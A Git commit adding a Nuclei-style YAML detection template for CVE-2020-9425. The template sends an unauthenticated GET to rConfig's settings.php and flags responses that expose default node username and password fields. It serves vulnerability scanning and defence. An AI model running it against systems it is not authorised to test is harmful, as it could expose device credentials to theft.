Create CVE-2020-9425.yaml

patch-1
SaN ThosH 2021-02-15 01:13:33 +05:30 committed by GitHub
parent f55ce896ca
commit 4ddfc3b1ef
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: CVE-2020-9425
info:
name: rConfig Unauthenticated Sensitive Information Disclosure
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9425
tags: Information Disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/settings.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "defaultNodeUsername"
- "defaultNodePassword"
part: body